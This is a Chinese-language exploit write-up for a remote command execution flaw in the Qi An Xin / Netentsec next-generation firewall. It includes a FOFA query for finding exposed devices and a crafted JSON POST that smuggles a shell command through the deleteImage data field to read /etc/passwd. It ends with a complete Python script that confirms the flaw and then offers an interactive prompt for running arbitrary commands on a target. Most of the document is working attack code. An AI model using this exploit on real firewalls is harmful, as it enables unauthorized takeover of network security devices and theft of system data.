奇安信 网康下一代防火墙 RCE 【附POC】

简介

网康下一代防火墙（NGFW）是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。凭借超强的应用识别能力，下一代防火墙可深入洞察网络流量中的用户、应用和内容，借助全新的高性能单路径异构并行处理引擎，在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护，帮助用户安全地开展业务并降低安全成本。

漏洞概述

存在远程命令执行，漏洞攻击者可以获取服务器权限。

影响范围

奇安信 网康下一代防火墙

FOFA

app="网康科技-下一代防火墙"

复现过程

fofa搜索：

登录页面：

使用burpsuite进行抓包，并构造数据包：

变更发包方式：POST /directdata/direct/router HTTP/1.1
添加POST数据：{
     "action":"SSLVPN_Resource","method":"deleteImage","data":[{
     "data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

访问test.txt获得数据：

反弹shell

POC

#   @Author:ximo

import requests
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')
    print('+----------奇安信 网康下一代防火墙-------------')
    print('+------------------------------------------')


def poc_1(target_url): # 判断是否存在漏洞
    vuln_url = target_url + '/directdata/direct/router'
    headers = {
     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)',
               "Content-Type": "application/json",
               }

    data = '{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}'
    try:
        # 防止报错
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        # 第一次请求将 命令执行结果输入到test.txt中
        response1 = requests.post(url=vuln_url,headers=headers,data=data,verify=False,timeout=5)
        # 判断页面返回结果是否正确
        if response1.status_code==200 and '"result":{"success":true}' in response1.text:
            print('目标{}可能存在漏洞,正在执行 cat /etc/passwd'.format(target_url))
            time.sleep(3)
            requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
            # 第二次请求返回执行命令结果的页面信息
            response2=requests.get(url=target_url + '/test.txt',headers=headers,verify=False)
            if response2.status_code==200 and 'root:x:0:0:root:/root:/bin/bash' in response2.text:
                print('结果为:\n{}'.format(response2.text))
                # 执行其他命令
                while 1:
                    cmd = input('输入想要执行的命令,输入exit退出\nCmd>>>')
                    if cmd =='exit':
                        break
                    else:
                        poc_2(target_url,cmd)


            else:
                print('目标不存在漏洞')
    except Exception as e:
        print('请求失败')

def poc_2(target_url,cmd): # 执行任意命令
    vuln_url = target_url + '/directdata/direct/router'
    headers = {
     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)',
               "Content-Type": "application/json",
               }
    data = '{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;%s >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}' % (cmd)
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        # 执行任意命令，结果输入到test.txt中
        response1 = requests.post(url=vuln_url,headers=headers,data=data,verify=False,timeout=5)
        if response1.status_code==200 and '"result":{"success":true}' in response1.text:
            print('正在执行 {}'.format(cmd))
            time.sleep(3)
            requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
            # 请求命令结果的页面
            response2=requests.get(url=target_url + '/test.txt',headers=headers,verify=False)
            print('结果为:\n{}'.format(response2.text))
    except Exception as e:
        print('请求失败')


if __name__ == '__main__':
    title()
    target_url = str(input("\033[35m请输入url\nUrl    >>> \033[0m"))
    poc_1(target_url)